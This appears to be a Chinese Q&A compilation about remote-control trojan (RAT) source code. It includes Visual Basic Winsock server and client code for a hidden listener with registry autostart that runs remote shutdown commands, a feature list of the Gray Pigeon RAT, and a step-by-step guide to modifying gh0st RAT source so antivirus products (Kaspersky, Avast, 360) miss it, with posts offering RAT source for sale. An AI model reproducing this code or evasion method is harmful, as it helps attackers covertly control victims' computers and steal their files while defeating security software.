遠控源碼
自己找個VPS
然後IP配置到源碼裡面
埠如果沒問題的話
直接就可以遠程驗證生成了
p.s.
那些爛大街的源碼就不要拿出去坑人了
沒啥意思的
2. 需要功能強大的遠控源碼
圈子混的都知道這東西不可能不收費的,免費的絕對騙子。200出售 需要私信我。
3. VB遠程式控制制源碼
你要求很高啊
遠程式控制制是要被控方的電腦上運行有你的程序,並沒有多麼神奇,你學下vb網路通信-winsock就可以自己編遠程式控制制的了。
比如說伺服器上有這樣的功能:如果接收到一個數據比如說"123"時就開始接收一個程序的數據包,接受完後自己解壓後運行,至於發過去的程序自然是你想怎樣就怎樣。這樣的程序如果在用戶面前明明白白地運行那就叫遠程式控制制,如果不讓用戶發現那就叫木馬。
winsock用法(轉載……)
VB winsock控制項詳解2009-09-29 14:41*屬性
-------------------------------------------------------------------------
LocalHostName | 本地機器名
LocalIP | 本地機器IP地址
LocalPort | 本地機器通信程序的埠(0<埠<65536)
RemoteHost | 遠程機器名
RemotePort | 遠程機器的通信程序埠
state | 連接的當前狀態(文後有詳細說明)
Protocal | 使用TCP或UDP協議(這里我們選『0-sckTCPProtocal』)
--------------------------------------------------------------------------
*方法
--------------------------------------------------------------------------
Listen
Listen方法用於伺服器程序,等待客戶訪問。
格式:Winsock對象.listen
Connect
Connect方法用於向遠程主機發出連接請求
格式:Winsock對象.connect [遠程主機IP,遠程埠]
Accept
Accept方法用於接受一個連接請求
格式:Winsock對象.accept Request ID
Senddata
此方法用於發送數據
格? Winsock對象.senddata 數據
Getdata
用來取得接收到的數據
格式:Winsock對象.getdata 變數 [,數據類型 [,最大長度]]
Close
關閉當前連接
格式:Winsock對象.close
*事件
----------------------------------------------------------------------------
Close | 遠程機器關閉連接時觸發
Connect | 連接建立好,可以進行通信時觸發(客戶端)
ConnectRequest | 有請求連接到達時產生(伺服器端)
DataArrival | 有數據到達時觸發
Error | 發生錯誤時發生
SendProgress | 數據傳送進度
-----------------------------------------------------------------------------
程序代碼如下:
--》伺服器端程序(server.exe)
先在窗體中放置Winsock控制項(他在運行時是看不見的),屬性採用默認值,再設置Form1的
屬性ShowInTaskBar為False,Visible為False(這樣才有隱蔽性嘛).對於程序的自啟動可
手工在注冊表「HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run」
中增加鍵值"winserver"="c:\\windows\\server.exe"或配置文件Win.ini的Load,run寫入
"C:\windows\server.exe"來達到目的。當然也可通過在VB5中調用API函數來實現對注冊表
的寫入,這就更方便了,不過由於實現過程較復雜,就不在這里說了.
Private Sub Form_Load()
On Error GoTo skip 如此埠已有通信程序則退出
Winsock1.LocalPort = 1334 埠值應大於1024,如還有沖突可改為其他值
Winsock1.Listen
Exit Sub
skip:
If Err.Number = 10048 Then
MsgBox "埠沖突,退出!", vbOKOnly, "注意!"
End
End If
End Sub
Private Sub Winsock1_Close()
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Listen 關閉連接後繼續監聽
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID 請求到達時,接受連接
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim strget As String
Dim ccom As String
Winsock1.GetData strget 讀取到達的數據
Select Case strget
Case "a" 判斷到達的數據是否『a』,是則重啟,你也可自己定義(協議就是這樣產生的)
ccom = curr_win() + "\RUNDLL.EXE user.exe,exitwindowsexec" 不同機器設置不一樣
Call Shell(ccom, vbHide) 由函數curr_win()來判斷
Case "b" 如為『b』則關閉計算機
ccom = curr_win() + "\RUNDLL.EXE user.exe,exitwindows"
Call Shell(ccom, vbHide) 函數shell來執行命令
Case Else 可以在此加入其他命令
End Select
End Sub
Function curr_win() As String
Dim i As Integer
Dim enstr As String
i = 1 此函數通過讀取環境變數來獲得Windows目錄
enstr = Environ(i)
Do While enstr <> ""
If Len(enstr) > 11 Then
If Left(enstr, 11) = "winbootdir=" Then
curr_win = Right(enstr, Len(enstr) - 11)
Exit Do
End If
End If
i = i + 1
enstr = Environ(i)
Loop
End Function
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal
Scode As Long, ByVal Source As String, ByVal HelpFile As String,
ByVal HelpContext As Long, CancelDisplay As Boolean)
MsgBox "錯誤", vbOKOnly, "注意!" 如程序出現錯誤,則簡單的退出
End
End Sub
--》客戶端程序(Client.exe)
程序界面如圖[control.jpg]
防入四個命令按鈕,一個標題框,一個Winsock控制項,其屬性設置如下:
------------------------------------------------------------------------- -
控制項名 | 控制項類 | 屬性 | 屬性值
----------------------------------------------------------------------------
closewin_but | commandbutton | caption | 遠程關閉
startwin_but | commandbutton | caption | 遠程重啟
connect_but | commandbutton | caption | 連接
exit_but | commandbutton | caption | 退出
state_lab | label | borderstyle | 1
-----------------------------------------------------------------------------
代碼如下:
Private Sub Form_Load()
Winsock1.LocalPort = 22226 本地埠可任選,只要不沖突且小於65535,用
netstat -an命令可查看當前通信進程
Winsock1.RemoteHost = "127.0.0.1" 調試時此IP將對本機操作,實際應用時可
換上被控方IP
Winsock1.RemotePort = 1334 對應伺服器端的localport
state_lab = "未建立連接."
End Sub
Private Sub closewin_but_Click()
If Winsock1.State <> sckConnected Then
state_lab = "請先建立連接"
Else
Winsock1.SendData "b" 發出關閉命令
End If
End Sub
Private Sub startwin_but_Click()
If Winsock1.State <> sckConnected Then
state_lab = "請先建立連接"
Else
Winsock1.SendData "a" 發出重啟命令
End If
End Sub
Private Sub connect_but_Click()
On Error GoTo skip
If Winsock1.State = sckConnected Then
state_lab = "已建立連接了"
Else
Winsock1.Connect
End If
Exit Sub
skip: 用netstat命令看到狀態為Time_wait則
If Err.Number = 10048 Then 須等待一段時間才可連接,也可換另一
埠,可加快連接速度
MsgBox "埠正在使用,請稍後再試!", vbOKOnly, "注意!"
End
End If
End Sub
Private Sub exit_but_Click()
Winsock1.Close 關閉連接且退出
End
End Sub
Private Sub Winsock1_Connect()
state_lab = "建立連接成功!可發送命令."
End Sub
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String,
ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String,
ByVal HelpContext As Long, CancelDisplay As Boolean)
MsgBox "錯誤", vbOKOnly, "注意!"
End
End Sub
通過上面的例子,我們大概了解了遠程式控制制的原理,對於其他功能的實現應該不難了。如
文件的下載,可先讓客戶程序發一命令字串cc:\windows\lzh.pwl,伺服器接收到命令字
串後判斷出首字母c為下載命令,則將所指定的命令文件c:\windows\lzh.pwl傳送給客戶
端,完成相應的服務。需要注意的是,此程序只能建立一個連接,如要建立多個連接可通過
在伺服器端產生多個Winsock實例來接受請求.
*****測試環境:
Window98,MicroSoft Visual Basic 5.0企業版
附:屬性state值
常數 值 描述
sckClosed 0 關閉狀態
sckOpen 1 打開狀態
sckListening 2 偵聽狀態
sckConnectionPending 3 連接掛起
sckResolvingHost 4 解析域名
sckHostResolved 5 已識別主機
sckConnecting 6 正在連接
sckConnected 7 已連接
sckClosing 8 同級人員正在關閉連接
sckError 9 錯誤
4. 遠程式控制制Delphi源代碼
http://www.2ccc.com/search.asp?KeyWord=%BB%D2%B8%EB%D7%D3
灰鴿子VIP1.2的源代碼
灰鴿子是一個遠程式控制制類軟體,主要功能有:
1.文件管理:模枋 Windows 資源管理器,可以對文件進行:復制、粘貼、刪除,重命名、遠程運行等,可以上傳下載文件或文件夾,操作簡單易用。
2.遠程式控制制命令:查看遠程系統信息、剪切板查看、進程管理、窗口管理、外設控制、服務管理、共享管理、代理服務、MS-Dos模擬、其它控制!
3.捕獲屏幕:不但可以連繼的捕獲遠程電腦屏幕,還能把本地的滑鼠及鍵盤傳動作送到遠程實現實時控制功能!
4.注冊表模擬器:遠程注冊表操作就像操作本地注冊表一樣方便!
5.遠程通訊:除普通的文字聊天以外,還有語音聊天的功能(雙方ADSL上網情況下語音良好)!
6.代理服務:可以讓服務端開放Socks5代理伺服器功能,還可以讓服務端開放FTP功能!
7.命令廣播:可以對自動上線主機進行命令播,如關機、重啟、打開網頁等,點一個按鈕就可以讓N台機器同時關機或其它操作!
5. 誰能給我遠程式控制制源碼沒有用的不要
只有源碼沒有教程
你要的話可以給你
6. 遠控源碼免殺需要什麼工具
遠控軟體gh0st源碼免殺
遠控軟體gh0st3.6開源了,開源意味著我們可以在此基礎上進行二次開發,同時也意味著殺軟可以較容易的查殺該款遠控木馬,既然要利用,我們就做好源碼基礎上的木馬免殺工作。
好久沒有來博客了,我把免殺這部分整理了一下,先拋一磚頭,有興趣的朋友可以接著做,也可以和本人交流。
序
gh0st遠控軟體採用驅動級RESSDT過主動,svchost參數啟動,替換系統服務的方式工作的,工作方式較為先進,美中不足的部分是沒有進行驅動級或用戶級隱藏,當然這部分可以添加進去。編碼利用了VC的編程環境。
一、環境配置
編譯環境一定要配置好:DDK+SDK+VC6,DDK用來編譯sys文件的,SDK+VC6是用來編譯工程的,配置部分比較簡單,網上有很多資料,這里不再詳述,有興趣的朋友也可以查看DDK和SDK的相關幫助。
二、特徵碼定位簡述
殺毒軟體查殺木馬的原理基本是根據特徵查殺的,被查殺的部分我們稱之為特徵碼,所以我們可以利用特徵碼定位工具MyCLL定位出病毒的特徵碼位置,定位工具原理是將被掃描木馬分塊,利用分段填充的方式,匹配殺軟的特徵值,找到殺軟查殺病毒的位置。
定位出特徵碼,如何反向找到源碼中的對應位置呢?請看下面分析,
三、二進制文件與源碼定位之map文件利用
map文件是二進制和源碼之間對應的一個映射文件。
我們假設根據第三步我們定位出了病毒的特徵碼:
病毒名稱 特徵碼位置 內存地址
svchost.dll 000038AA_00000002 100044AA
svchost.dll 00005F98_00000002
第一步設置VC編譯環境生成Map文件。
在 VC 中,點擊菜單「Project -> Settings」選項頁(或按下 Alt+F7),選擇 C/C++ 選項卡,並在最下面的 Project Options 裡面輸入:/Zd ,然後要點擊 Link 選項卡,選中「Generate mapfile」復選框,並在最下面的 Project Options 裡面輸入:/mapinfo:lines,表示生成 MAP 文件時,加入行信息。設置完成。
第二步編譯VC工程,設置活動工程編譯即可,這個不用說明。這個步驟完成後,在release(或debug)目錄,多了一個.map文件(比如svchost.map)。
第三步打開map文件(用UE或文本編輯器打開都行),形式如下:
(begin)
Timestamp is 488fcef2 (Wed Jul 30 10:16:18 2008)
Preferred load address is 10000000
---------------------------------------------------------------------------1----(為方便說明,wrw添加)
Start Length Name Class
0001:00000000 00010a50H .text CODE
0001:00010a50 00000485H .text$x CODE
0002:00000000 000004c8H .idata$5 DATA
......
0003:00000010 00000004H .CRT$XIZ DATA
0003:00000020 00001a50H .data DATA
0003:00001a70 00000688H .bss DATA
0004:00000000 000000a8H .rsrc$01 DATA
0004:000000b0 00000cf0H .rsrc$02 DATA
----------------------------------------------------------------------------2---(為方便說明,wrw添加)
Address Publics by Value Rva+Base Lib:Object
0001:00000000 ??0CAudio@@QAE@XZ 10001000 f Audio.obj
0001:000000d0 ??_GCAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000d0 ??_ECAudio@@UAEPAXI@Z 100010d0 f i Audio.obj
0001:000000f0 ??1CAudio@@UAE@XZ 100010f0 f Audio.obj
0001:000001e0 ?getRecordBuffer@CAudio@@QAEPAEPAK@Z 100011e0 f Audio.obj
0001:00000240 ?playBuffer@CAudio@@QAE_NPAEK@Z 10001240 f Audio.obj
0001:000002c0 ?InitializeWaveIn@CAudio@@AAE_NXZ 100012c0 f Audio.obj
......
0001:00003310 ?SendToken@CFileManager@@AAEHE@Z 10004310 f FileManager.obj
0001:00003320 ?UploadToRemote@CFileManager@@AAE_NPAE@Z 10004320 f FileManager.obj
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
0001:00003670 ?StopTransfer@CFileManager@@AAEXXZ 10004670 f FileManager.obj
0001:00003730 ?CreateLocalRecvFile@CFileManager@@AAEXPAE@Z 10004730 f FileManager.obj
......
----------------------------------------------------------------------------3---(為方便說明,wrw添加)
Line numbers for ./Release/FileManager.obj(E:/vtmp/gh0st3src/Server/svchost/common/FileManager.cpp) segment .text
17 0001:00002630 20 0001:0000267f 21 0001:00002698 24 0001:000026d0
25 0001:000026f8 26 0001:0000273c 29 0001:000027d0 33 0001:000027ee
77 0001:000027f8 36 0001:000027fb 37 0001:00002803 77 0001:0000280d
......
532 0001:0000340f 534 0001:00003414 537 0001:00003428 540 0001:00003440
546 0001:0000345d 547 0001:00003487 548 0001:00003490 549 0001:00003492
551 0001:0000349e 552 0001:000034b8 553 0001:000034cb 554 0001:000034d4
558 0001:000034de 560 0001:000034e9 563 0001:000034ee 564 0001:00003506
......
(end)
我們看下,定位svchost.dll 的第一個特徵碼內存地址為:100044AA,在第2塊中,我們可以找到RVA+BASE與之很接近的是
0001:00003440 ?FixedUploadList@CFileManager@@AAE_NPBD@Z 10004440 f FileManager.obj
這樣我們可以定位到FileManager.cpp中的FixedUploadList函數,是不是范圍縮小了?
下面我們再縮小代碼行
利用這個公式:特徵碼行偏移 = 特徵碼地址(Crash Address)- 基地址(ImageBase Address)- 0x1000
看起來好像很難,其實很簡單,我們將100044AA去掉內存基址10000000,再減1000,因為PE很多從1000開始,可以得到代碼偏移地址為34AA。到第3塊中找對應的代碼行。
偏移地址34AA在(551 0001:0000349e 552 0001:000034b8 )中間,也就是551行和552行中間,我們到源程序中查找第551行:
wsprintf(lpszFilter, "%s%s*.*", lpPathName, lpszSlash);
這樣就定位出源代碼了,要怎麼修改就怎麼修改它就可以了。
四、實戰免殺
A、卡巴免殺
首次編譯後,先做卡巴的免殺。卡巴殺sys文件和dll,當然也就殺包裝它們的install.exe,最後卡巴還殺生成的sever,我這里說殺生成好的server不是和前面的特徵碼重疊的地方,而是殺配置信息。
第一步、sys免殺
sys重新編譯後,增加了輸入表的函數,同時系統不同,造成很多地方不同於原特徵,順利通過卡巴、金山、小紅傘等殺軟。
第二步、svchost.dll免殺
特徵碼定位MultiByteToWideChar和"gh0st update"兩個位置。這里是通過第3步map文件得出的。
卡巴怕加花指令, 這個函數MultiByteToWideChar的調用上,可以在這個函數前面隨便加幾句無效語句就可以通過卡巴殺軟。
字元串調用"gh0st update" ,這個是用於更新用的 ,如果不要在線更新,直接把這個語句所在代碼塊刪除;嘿嘿,其實搜索工程替換這個字元串為其他的字元串就可以了^_^,這個方法同時可以過金山殺軟。
第三步、server免殺
卡巴定位在最後的配置信息,採取跳轉顯然是不行的,採用加花的辦法,在寫入AAAAAA配置信息之前,隨便寫些東西,就可以做server免殺。
卡巴免殺完成!
B、Avast免殺
最新的avast殺軟再查殺1下,殺install.exe和svchost.dll(也就是殺生成的文件和其中的資源文件),接著做它的源碼免殺。
定位在特徵字元串%02d/%02d/%02d和「SYSTEM/CurrentControlSet/Services/%s」兩個地方。
解決方案:
1、svchost.dll的特徵碼定位在鍵盤記錄KeyboardManager.cpp文件中的SaveInfo(char *lpBuffer)函數。特徵字元串%02d/%02d/%02d,也就是我們看到鍵盤記錄的日期,修改之,修改的方法很多,將其改為[%d/%d/%d %d:%d:%d] ,編譯即可通過avast殺軟。
2、install的特徵碼定位在「SYSTEM/CurrentControlSet/Services/%s」,對應文件是install.cpp里的InstallService函數,修改大小寫,編譯即可通過免殺。
五、添加垃圾代碼的小方法
垃圾代碼要移動特徵碼所在的位置,不要跑到堆棧中了,這樣的代碼沒有用。可以採取添加for循環,做計數,簡單統計,採用局部變數,不改變後面的邏輯為宜。
添加輸出表的方法:
有殺輸出表的,可以在生成的svchost.dll上添加空函數 ,但是每次編譯都要修改1次資源 ,其實我們在源碼上添加如下語句:
extern "C" __declspec(dllexport) bool JustTempFun();//聲明
……
extern "C" __declspec(dllexport) bool JustTempFun() //實現
{
return false;
}
編譯後,輸出表就被改變了,有的殺軟就可做到代碼免殺。
六、gh0st自動生成6to4ex.dll的修改
看到好多站友提問自動生成6to4ex.dll的問題,有熱心站友也提出了自己的見解 ,我感覺有些人提出的解決方案不完全正確,有可能造成剛入手人誤解,我根據自己的理解說明1下。
gh0st服務端是通svchost -netsvcs啟動的,所以程序要利用netsvcs 服務,服務端也就是根據netsvcs生成的,故不能說服務端生成是隨機的,相對於大多數系統來講,基本是固定的,下面看分析。
查看install.cpp裡面的InstallService()方法,首先遍歷HKEY_LOCAL_MACHINE/SOFTWARE/ Microsoft/Windows NT/CurrentVersion/Svchost中的服務項,查找到一個服務後,程序採取替換服務的方法,將原服務刪除,然後生成對應服務項+ ex.dll的文件替換原服務,6to4服務一般排在第一位,6to4服務是一種自動構造隧道的方式,作用在於只需要一個全球惟一的IPv4地址便可使得整個站點獲得IPv6 的連接,這個服務對一般人來講,基本閑置,所以我們的程序就把6to4服務給替換掉,同時在windows/system32/目錄下生成 6to4ex.dll,以後啟動就是6to4ex了,如果把這個服務跳過去,就依次向下生成Ias、Iprip等服務啦,如果netsvcs項沒有可以替換的服務,則程序將自己添加1個服務,名稱就是由 AddsvchostService()方法產生的netsvcs_0x%d。
這樣說不知道關心服務名稱的明白了不?
這個不能說是技術問題,但是小技巧問題可以從這里產生,我不知道其他人的360是怎麼過的,但是我覺得可以提示1下的是,如果是360默認系統安全的服務,它肯定不會報不安全,替換閑置的系統安全的服務則通過360的效果要好的多
7. 遠程式控制制源碼,監控源碼,木馬源碼等
動態域名解析程序(Delphi源碼) 怎麼用啊
8. 誰有Ghost遠控源碼啊跪求
怎麼可能無毒。。。
9. 易語言免殺遠控源碼
烏龍寺技術站,此類源碼很多各種易語言的遠控源碼